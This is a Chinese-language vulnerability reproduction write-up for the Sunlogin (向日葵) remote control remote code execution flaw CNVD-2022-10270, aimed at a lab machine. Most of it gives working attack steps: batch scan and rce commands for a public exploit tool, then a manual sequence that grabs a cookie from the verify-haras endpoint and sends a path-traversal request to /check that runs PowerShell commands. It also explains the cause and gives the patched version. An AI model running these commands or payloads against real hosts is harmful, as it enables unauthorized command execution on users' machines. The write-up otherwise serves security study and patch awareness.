向日葵远程代码执行漏洞(RCE)漏洞复现

简介

向日葵远程控制是一款远程控制服务的软件。支持操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件

漏洞概述

向日葵远程控制软件存在远程命令执行漏洞,远程攻击者在未授权情况下可通过构造特殊请求执行任意命令,存在命令执行漏洞CNVD-2022-10270、CNVD-2022-03672。

影响范围

向日葵个人版for Windows <= 11.0.0.33826

向日葵简约版<= V1.0.1.43315(2021.12)

工具复现(支持批量检测)

工具(包含漏洞版本的向日葵):

https://github.com/ce-automne/SunloginRCE

靶机 IP:192.168.1.107

工具命令:

  • -c 需要执行的命令
  • -h 指定目标或者指定网段
  • -n 设置扫描线程(默认为600)
  • -p 设置扫描端口范围 默认40000到65535 (默认为“50000”)
  • -t 选择攻击类型:scan或者 rce
./main -h 192.168.1.107 -t scan -p 40000-65535 -n 2000

./main -t rce -h 192.168.1.107 -p 49710 -c 'whoami'

手动复现

nmap探测端口

nmap 192.168.1.107 -p 40000-65535

浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras,获取cookie值

http://192.168.1.107:49710/cgi-bin/rpc?action=verify-haras

http://192.168.1.107:49710/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

原理

当向日葵客户端在windows运行时,会连接远程Oray的服务器,开放对外接口,接口由sunlogin处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check处,当cmd的值为ping/nslookup开头时触发。

修复方式

厂商已发布升级修复漏洞,请及时更新至12.5.0.44227最新版本。https://sunlogin.oray.com/download

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

Last modification:March 2, 2022
如果觉得我的文章对你有用,请随意赞赏